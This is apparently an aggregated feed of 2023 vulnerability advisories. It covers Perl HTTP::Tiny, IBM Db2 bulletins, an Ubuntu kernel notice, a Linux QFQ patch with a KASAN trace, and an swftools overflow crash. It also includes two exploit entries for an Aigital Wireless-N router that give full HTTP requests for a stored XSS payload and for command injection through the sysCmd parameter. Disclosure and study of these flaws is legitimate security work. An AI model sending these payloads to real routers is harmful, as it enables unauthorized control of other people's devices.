HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2023-31486: security - Perl's HTTP::Tiny has insecure TLS cert default, affecting CPAN.pm and other modules

A cross-site scripting (XSS) vulnerability in Aigital Wireless-N Repeater Mini_Router v0.131229 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the wl_ssid parameter at /boafrm/formHomeWlanSetup.

    # Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229XSS StoredPOST /boafrm/formHomeWlanSetup HTTP/1.1Host: 192.168.10.253User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 265Origin: http://192.168.10.253Connection: closeReferer: http://192.168.10.253/home.htmUpgrade-Insecure-Requests: 1submit-url=&submit-value=&wl_onoff=0&wps_clear_configure_by_reg=0&wl_ssid=<script>alert("XSS")</script>&wl_mode=0&wl_channel=0&wl_Method=4&wl_authType=auto&wepEnabled=ON&weplength=&wepformat=&wl_wpaAuth=psk&wl_pskFormat=0&ciphersuite=aes&wpa2ciphersuite=aes&wl_pskValue=12345678&dhcp=0

CVE-2023-30405: Aigital Wireless-N Repeater Mini_Router.0.131229 Cross Site Scripting ≈ Packet Storm

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause.  IBM X-Force ID:  247864.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service as the server may crash when using a specially crafted SQL query using a LIMIT clause.

**Vulnerability Details**

**CVEID:**   CVE-2023-26021  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247864 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2  V11.1, and V11.5 server editions on all platforms are affected. 

IBM Db2 V10.5 is not affected.

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V11.1.4 FP7, v11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.1

TBD

DT160619

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT160619

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

24 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5,11.1","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-26021: IBM® Db2® is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause. (CVE-2023-26021)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server may crash when an Out of Memory occurs using the DBMS_OUTPUT module.  IBM X-Force ID:  247868.

CVE-2023-26022: IBM Db2 denial of service CVE-2023-26022 Vulnerability Report

IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 is vulnerable to a denial of service when attempting to use ACR client affinity for unfenced DRDA federation wrappers.  IBM X-Force ID:  249187.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service as the server may crash when when attempting to use ACR client affinity for unfenced DRDA federation wrappers.

**Vulnerability Details**

**CVEID:**   CVE-2023-27555  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) is vulnerable to a denial of service when attempting to use ACR client affinity for unfenced DRDA federation wrappers.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249187 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2 V11.5 server editions on all platforms are affected. 

IBM Db2 V11.1 and 10.5 are not affected.

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  v11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.5

TBD

DT188887

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

 Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

Remove the unsupported options from the db2dsdriver.cfg configuration for the federated data source. If the configuration cannot be changed because it shared with other applications then provide a separate configuration for the federated data source.

**References**

Off

**Change History**

24 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-27555: IBM® Db2® is vulnerable to a denial of service as the server may crash when when attempting to use ACR client affinity for unfenced DRDA federation wrappers. (CVE-2023-27555)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 11.1, and 11.5 is vulnerable to a denial of service.  Under rare conditions, setting a special register may cause the Db2 server to terminate abnormally.  IBM X-Force ID:  247862.

CVE-2023-25930: IBM X-Force Exchange

Ubuntu Security Notice 6047-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges. Please note that with the fix for this CVE, kernel support for the TCINDEX classifier has been removed.

    ==========================================================================Ubuntu Security Notice USN-6047-1April 27, 2023linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-4.15,linux-azure-5.4, linux-gcp, linux-gcp-4.15, linux-gcp-5.4, linux-gke,linux-gkeop, linux-hwe, linux-hwe-5.4, linux-ibm, linux-kvm, linux-oracle,linux-oracle-5.4 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1048-ibm      5.4.0-1048.53   linux-image-5.4.0-1068-gkeop    5.4.0-1068.72   linux-image-5.4.0-1090-kvm      5.4.0-1090.96   linux-image-5.4.0-1098-gke      5.4.0-1098.105   linux-image-5.4.0-1100-oracle   5.4.0-1100.109   linux-image-5.4.0-1101-aws      5.4.0-1101.109   linux-image-5.4.0-1104-gcp      5.4.0-1104.113   linux-image-5.4.0-1107-azure    5.4.0-1107.113   linux-image-5.4.0-148-generic   5.4.0-148.165   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165   linux-image-5.4.0-148-lowlatency  5.4.0-148.165   linux-image-aws-lts-20.04       5.4.0.1101.98   linux-image-azure-lts-20.04     5.4.0.1107.100   linux-image-gcp-lts-20.04       5.4.0.1104.106   linux-image-generic             5.4.0.148.146   linux-image-generic-hwe-18.04   5.4.0.148.146   linux-image-generic-hwe-18.04-edge  5.4.0.148.146   linux-image-generic-lpae        5.4.0.148.146   linux-image-generic-lpae-hwe-18.04  5.4.0.148.146   linux-image-generic-lpae-hwe-18.04-edge  5.4.0.148.146   linux-image-gke                 5.4.0.1098.103   linux-image-gke-5.4             5.4.0.1098.103   linux-image-gkeop               5.4.0.1068.66   linux-image-gkeop-5.4           5.4.0.1068.66   linux-image-ibm                 5.4.0.1048.74   linux-image-ibm-lts-20.04       5.4.0.1048.74   linux-image-kvm                 5.4.0.1090.84   linux-image-lowlatency          5.4.0.148.146   linux-image-oem                 5.4.0.148.146   linux-image-oem-osp1            5.4.0.148.146   linux-image-oracle-lts-20.04    5.4.0.1100.93   linux-image-virtual             5.4.0.148.146Ubuntu 18.04 LTS:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129   linux-image-4.15.0-1139-kvm     4.15.0-1139.144   linux-image-4.15.0-1149-gcp     4.15.0-1149.165   linux-image-4.15.0-1164-azure   4.15.0-1164.179   linux-image-4.15.0-210-generic  4.15.0-210.221   linux-image-4.15.0-210-generic-lpae  4.15.0-210.221   linux-image-4.15.0-210-lowlatency  4.15.0-210.221   linux-image-5.4.0-1100-oracle   5.4.0-1100.109~18.04.1   linux-image-5.4.0-1101-aws      5.4.0-1101.109~18.04.1   linux-image-5.4.0-1104-gcp      5.4.0-1104.113~18.04.1   linux-image-5.4.0-1107-azure    5.4.0-1107.113~18.04.1   linux-image-5.4.0-148-generic   5.4.0-148.165~18.04.1   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165~18.04.1   linux-image-5.4.0-148-lowlatency  5.4.0-148.165~18.04.1   linux-image-aws                 5.4.0.1101.79   linux-image-azure               5.4.0.1107.80   linux-image-azure-lts-18.04     4.15.0.1164.132   linux-image-gcp                 5.4.0.1104.80   linux-image-gcp-lts-18.04       4.15.0.1149.163   linux-image-generic             4.15.0.210.193   linux-image-generic-hwe-18.04   5.4.0.148.165~18.04.119   linux-image-generic-lpae        4.15.0.210.193   linux-image-generic-lpae-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-kvm                 4.15.0.1139.130   linux-image-lowlatency          4.15.0.210.193   linux-image-lowlatency-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-oem                 5.4.0.148.165~18.04.119   linux-image-oem-osp1            5.4.0.148.165~18.04.119   linux-image-oracle              5.4.0.1100.109~18.04.72   linux-image-oracle-lts-18.04    4.15.0.1118.123   linux-image-snapdragon-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-virtual             4.15.0.210.193   linux-image-virtual-hwe-18.04   5.4.0.148.165~18.04.119Ubuntu 16.04 ESM:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129~16.04.1   linux-image-4.15.0-1149-gcp     4.15.0-1149.165~16.04.1   linux-image-4.15.0-1164-azure   4.15.0-1164.179~16.04.1   linux-image-4.15.0-210-generic  4.15.0-210.221~16.04.1   linux-image-4.15.0-210-lowlatency  4.15.0-210.221~16.04.1   linux-image-azure               4.15.0.1164.148   linux-image-gcp                 4.15.0.1149.139   linux-image-generic-hwe-16.04   4.15.0.210.195   linux-image-gke                 4.15.0.1149.139   linux-image-lowlatency-hwe-16.04  4.15.0.210.195   linux-image-oem                 4.15.0.210.195   linux-image-oracle              4.15.0.1118.99   linux-image-virtual-hwe-16.04   4.15.0.210.195Ubuntu 14.04 ESM:   linux-image-4.15.0-1164-azure   4.15.0-1164.179~14.04.1   linux-image-azure               4.15.0.1164.130After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6047-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-148.165   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1101.109   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1107.113   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1104.113   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1098.105   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1068.72   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1048.53   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1090.96   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1100.109   https://launchpad.net/ubuntu/+source/linux/4.15.0-210.221   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1101.109~18.04.1   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1164.179   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1107.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1149.165   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1104.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-148.165~18.04.1   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1139.144   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1118.129   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1100.109~18.04.1

Ubuntu Security Notice USN-6047-1

Aigital Wireless-N Repeater version Mini_Router.0.131229 suffers from a remote command execution vulnerability.

    # Exploit Title: Aigital Wireless-N Repeater - Command Injection# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229Command InjectionPOST /boafrm/formSysCmd HTTP/1.1Host: 192.168.10.253User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 31Origin: http://192.168.10.253Connection: closeReferer: http://192.168.10.253/setok.htmUpgrade-Insecure-Requests: 1sysCmd=ping+-c10+192.168.10.101

Aigital Wireless-N Repeater Mini_Router.0.131229 Remote Command Execution

qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.

Permalink

Browse files

Browse the repository at this point in the history

net: sched: sch\_qfq: prevent slab-out-of-bounds in qfq\_activate\_agg

If the TCA\_QFQ\_LMAX value is not offered through nlattr, lmax is determined by the MTU value of the network device.
The MTU of the loopback device can be set up to 2^31-1.
As a result, it is possible to have an lmax value that exceeds QFQ\_MIN\_LMAX.

Due to the invalid lmax value, an index is generated that exceeds the QFQ\_MAX\_INDEX(=24) value, causing out-of-bounds read/write errors.

The following reports a oob access:

\[   84.582666\] BUG: KASAN: slab-out-of-bounds in qfq\_activate\_agg.constprop.0 (net/sched/sch\_qfq.c:1027 net/sched/sch\_qfq.c:1060 net/sched/sch\_qfq.c:1313)
\[   84.583267\] Read of size 4 at addr ffff88810f676948 by task ping/301
\[   84.583686\]
\[   84.583797\] CPU: 3 PID: 301 Comm: ping Not tainted 6.3.0-rc5 #1
\[   84.584164\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
\[   84.584644\] Call Trace:
\[   84.584787\]  <TASK>
\[   84.584906\] dump\_stack\_lvl (lib/dump\_stack.c:107 (discriminator 1))
\[   84.585108\] print\_report (mm/kasan/report.c:320 mm/kasan/report.c:430)
\[   84.585570\] kasan\_report (mm/kasan/report.c:538)
\[   84.585988\] qfq\_activate\_agg.constprop.0 (net/sched/sch\_qfq.c:1027 net/sched/sch\_qfq.c:1060 net/sched/sch\_qfq.c:1313)
\[   84.586599\] qfq\_enqueue (net/sched/sch\_qfq.c:1255)
\[   84.587607\] dev\_qdisc\_enqueue (net/core/dev.c:3776)
\[   84.587749\] \_\_dev\_queue\_xmit (./include/net/sch\_generic.h:186 net/core/dev.c:3865 net/core/dev.c:4212)
\[   84.588763\] ip\_finish\_output2 (./include/net/neighbour.h:546 net/ipv4/ip\_output.c:228)
\[   84.589460\] ip\_output (net/ipv4/ip\_output.c:430)
\[   84.590132\] ip\_push\_pending\_frames (./include/net/dst.h:444 net/ipv4/ip\_output.c:126 net/ipv4/ip\_output.c:1586 net/ipv4/ip\_output.c:1606)
\[   84.590285\] raw\_sendmsg (net/ipv4/raw.c:649)
\[   84.591960\] sock\_sendmsg (net/socket.c:724 net/socket.c:747)
\[   84.592084\] \_\_sys\_sendto (net/socket.c:2142)
\[   84.593306\] \_\_x64\_sys\_sendto (net/socket.c:2150)
\[   84.593779\] do\_syscall\_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
\[   84.593902\] entry\_SYSCALL\_64\_after\_hwframe (arch/x86/entry/entry\_64.S:120)
\[   84.594070\] RIP: 0033:0x7fe568032066
\[   84.594192\] Code: 0e 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 41 89 ca 64 8b 04 25 18 00 00 00 85 c09\[ 84.594796\] RSP: 002b:00007ffce388b4e8 EFLAGS: 00000246 ORIG\_RAX: 000000000000002c

Code starting with the faulting instruction
===========================================
\[   84.595047\] RAX: ffffffffffffffda RBX: 00007ffce388cc70 RCX: 00007fe568032066
\[   84.595281\] RDX: 0000000000000040 RSI: 00005605fdad6d10 RDI: 0000000000000003
\[   84.595515\] RBP: 00005605fdad6d10 R08: 00007ffce388eeec R09: 0000000000000010
\[   84.595749\] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000040
\[   84.595984\] R13: 00007ffce388cc30 R14: 00007ffce388b4f0 R15: 0000001d00000001
\[   84.596218\]  </TASK>
\[   84.596295\]
\[   84.596351\] Allocated by task 291:
\[   84.596467\] kasan\_save\_stack (mm/kasan/common.c:46)
\[   84.596597\] kasan\_set\_track (mm/kasan/common.c:52)
\[   84.596725\] \_\_kasan\_kmalloc (mm/kasan/common.c:384)
\[   84.596852\] \_\_kmalloc\_node (./include/linux/kasan.h:196 mm/slab\_common.c:967 mm/slab\_common.c:974)
\[   84.596979\] qdisc\_alloc (./include/linux/slab.h:610 ./include/linux/slab.h:731 net/sched/sch\_generic.c:938)
\[   84.597100\] qdisc\_create (net/sched/sch\_api.c:1244)
\[   84.597222\] tc\_modify\_qdisc (net/sched/sch\_api.c:1680)
\[   84.597357\] rtnetlink\_rcv\_msg (net/core/rtnetlink.c:6174)
\[   84.597495\] netlink\_rcv\_skb (net/netlink/af\_netlink.c:2574)
\[   84.597627\] netlink\_unicast (net/netlink/af\_netlink.c:1340 net/netlink/af\_netlink.c:1365)
\[   84.597759\] netlink\_sendmsg (net/netlink/af\_netlink.c:1942)
\[   84.597891\] sock\_sendmsg (net/socket.c:724 net/socket.c:747)
\[   84.598016\] \_\_\_\_sys\_sendmsg (net/socket.c:2501)
\[   84.598147\] \_\_\_sys\_sendmsg (net/socket.c:2557)
\[   84.598275\] \_\_sys\_sendmsg (./include/linux/file.h:31 net/socket.c:2586)
\[   84.598399\] do\_syscall\_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
\[   84.598520\] entry\_SYSCALL\_64\_after\_hwframe (arch/x86/entry/entry\_64.S:120)
\[   84.598688\]
\[   84.598744\] The buggy address belongs to the object at ffff88810f674000
\[   84.598744\]  which belongs to the cache kmalloc-8k of size 8192
\[   84.599135\] The buggy address is located 2664 bytes to the right of
\[   84.599135\]  allocated 7904-byte region \[ffff88810f674000, ffff88810f675ee0)
\[   84.599544\]
\[   84.599598\] The buggy address belongs to the physical page:
\[   84.599777\] page:00000000e638567f refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10f670
\[   84.600074\] head:00000000e638567f order:3 entire\_mapcount:0 nr\_pages\_mapped:0 pincount:0
\[   84.600330\] flags: 0x200000000010200(slab|head|node=0|zone=2)
\[   84.600517\] raw: 0200000000010200 ffff888100043180 dead000000000122 0000000000000000
\[   84.600764\] raw: 0000000000000000 0000000080020002 00000001ffffffff 0000000000000000
\[   84.601009\] page dumped because: kasan: bad access detected
\[   84.601187\]
\[   84.601241\] Memory state around the buggy address:
\[   84.601396\]  ffff88810f676800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.601620\]  ffff88810f676880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.601845\] >ffff88810f676900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602069\]                                               ^
\[   84.602243\]  ffff88810f676980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602468\]  ffff88810f676a00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602693\] ==================================================================
\[   84.602924\] Disabling lock debugging due to kernel taint

Fixes: 3015f3d ("pkt\_sched: enable QFQ to support TSO/GSO")
Reported-by: Gwangun Jung <exsociety@gmail.com>
Signed-off-by: Gwangun Jung <exsociety@gmail.com>
Acked-by: Jamal Hadi Salim<jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2023-31436: net: sched: sch_qfq: prevent slab-out-of-bounds in qfq_activate_agg · torvalds/linux@3037933

swfrender v0.9.2 was discovered to contain a heap buffer overflow in the function enumerateUsedIDs_fillstyle at modules/swftools.c

**1.heap-buffer-overflow****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id7\_heap-buffer-overflow.zip

**crash**

    ./swfrender id7_heap-buffer-overflow -o /dev/null
    ==1106906==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003eb at pc 0x557c2e072578 bp 0x7ffd975b4940 sp 0x7ffd975b4930
    READ of size 1 at 0x6070000003eb thread T0
        #0 0x557c2e072577 in enumerateUsedIDs_fillstyle modules/swftools.c:509
        #1 0x557c2e0728d1 in enumerateUsedIDs_styles modules/swftools.c:565
        #2 0x557c2e05c7d9 in swf_ParseShapeData modules/swfshape.c:692
        #3 0x557c2e06020d in swf_ShapeToShape2 modules/swfshape.c:884
        #4 0x557c2e04c298 in extractDefinitions readers/swf.c:375
        #5 0x557c2e04c298 in swf_open readers/swf.c:736
        #6 0x557c2e04800a in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:174
        #7 0x7f8c197fa082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x557c2e046ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
    0x6070000003eb is located 0 bytes to the right of 75-byte region [0x6070000003a0,0x6070000003eb)
    allocated by thread T0 here:
        #0 0x7f8c19c40808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x557c2e0e4ab9 in rfx_alloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:30
    
